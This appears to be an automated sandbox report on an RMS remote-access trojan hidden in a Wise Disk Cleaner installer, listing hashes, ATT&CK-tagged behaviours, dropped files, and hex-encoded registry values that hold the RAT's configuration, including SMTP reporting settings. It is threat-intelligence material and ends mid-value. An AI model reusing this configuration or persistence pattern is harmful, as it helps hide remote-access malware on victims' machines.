rms | 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443

Analysis

max time kernel
152s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
17-04-2022 07:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
Size

8.2MB
MD5

023821ea8f7c3745a2542de96753804b
SHA1

37ec844e943d934527cf51aaf5f31cadbcde6548
SHA256

63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443
SHA512

ca4405e02e7040caa339355aa485ab3c5bf13d3a2db3cdc5e442b0ea610d418d5ca81fddfc9ef0b1f59630baff16edc06747b5010bf0991cbd8b35114193eb41

Score

10^/10

rms discovery evasion rat spyware stealer trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\ssleay32.dll	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
File opened for modification	C:\Windows\SysWOW64\drivers\libeay32.dll	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
File opened for modification	C:\Windows\SysWOW64\drivers\svchîst.exe	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
File opened for modification	C:\Windows\SysWOW64\drivers\svchîst.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\install.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\install.exe	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe

Executes dropped EXE 10 IoCs

pid	Process
876	setup.exe
4632	setup.tmp
1372	install.exe
4516	CSTask.exe
1120	svchîst.exe
2408	WiseDiskCleaner.exe
3052	svchîst.exe
1932	svchîst.exe
856	svchîst.exe
4208	svchîst.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	svchîst.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	svchîst.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	svchîst.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	setup.tmp

Loads dropped DLL 12 IoCs

pid	Process
2408	WiseDiskCleaner.exe
2408	WiseDiskCleaner.exe
1120	svchîst.exe
1120	svchîst.exe
3052	svchîst.exe
3052	svchîst.exe
1932	svchîst.exe
1932	svchîst.exe
856	svchîst.exe
856	svchîst.exe
4208	svchîst.exe
4208	svchîst.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\software\avira\antivir desktop	WiseDiskCleaner.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\avira\antivir desktop	WiseDiskCleaner.exe
Key opened	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avira\antivirus	WiseDiskCleaner.exe
Key opened	\REGISTRY\MACHINE\software\avast software\avast	WiseDiskCleaner.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\avast software\avast	WiseDiskCleaner.exe
Key opened	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avast software\avast	WiseDiskCleaner.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	WiseDiskCleaner.exe
File opened (read-only)	\??\P:	WiseDiskCleaner.exe
File opened (read-only)	\??\U:	WiseDiskCleaner.exe
File opened (read-only)	\??\Z:	WiseDiskCleaner.exe
File opened (read-only)	\??\T:	WiseDiskCleaner.exe
File opened (read-only)	\??\X:	WiseDiskCleaner.exe
File opened (read-only)	\??\Y:	WiseDiskCleaner.exe
File opened (read-only)	\??\E:	WiseDiskCleaner.exe
File opened (read-only)	\??\K:	WiseDiskCleaner.exe
File opened (read-only)	\??\M:	WiseDiskCleaner.exe
File opened (read-only)	\??\R:	WiseDiskCleaner.exe
File opened (read-only)	\??\W:	WiseDiskCleaner.exe
File opened (read-only)	\??\F:	WiseDiskCleaner.exe
File opened (read-only)	\??\G:	WiseDiskCleaner.exe
File opened (read-only)	\??\L:	WiseDiskCleaner.exe
File opened (read-only)	\??\S:	WiseDiskCleaner.exe
File opened (read-only)	\??\Q:	WiseDiskCleaner.exe
File opened (read-only)	\??\V:	WiseDiskCleaner.exe
File opened (read-only)	\??\H:	WiseDiskCleaner.exe
File opened (read-only)	\??\J:	WiseDiskCleaner.exe
File opened (read-only)	\??\N:	WiseDiskCleaner.exe
File opened (read-only)	\??\O:	WiseDiskCleaner.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\idfgvgjnghcdfb.reg	attrib.exe
File created	C:\Windows\SysWOW64\idfgvgjnghcdfb.reg	cmd.exe

Drops file in Program Files directory 57 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-0U0TI.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GIIEQ.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UDKEJ.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MREEQ.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8DFJB.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GMTI7.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N51AI.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GSJ0B.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3AQ20.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-14VKG.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-4HH0U.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BNU1O.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GK4R7.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8EFVN.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-P4SP7.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BP6IL.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-MLER0.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9TT3J.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-IGT7O.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-E2B0R.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DHCCJ.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MD2O1.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JH35S.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M4OGA.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-M4CQV.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K6VJF.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2VUGG.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-49TVG.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FH5O6.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe	setup.tmp
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll	setup.tmp
File opened for modification	C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-322D1.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9LRK6.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-V5A52.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JEUB2.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3GB98.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2K8S9.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FTJ4K.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-L99TI.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8U5IC.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N3GO7.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AHPA0.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PMEAD.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FFP72.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-HS1UP.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-ACAMM.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-O517D.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1J6R4.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J4T27.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OIF4T.tmp	setup.tmp
File created	C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OQ2IF.tmp	setup.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 2 IoCs

evasion

pid	Process
5008	taskkill.exe
4876	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000"	WiseDiskCleaner.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	WiseDiskCleaner.exe

Modifies registry class 19 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe"	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00	svchîst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f736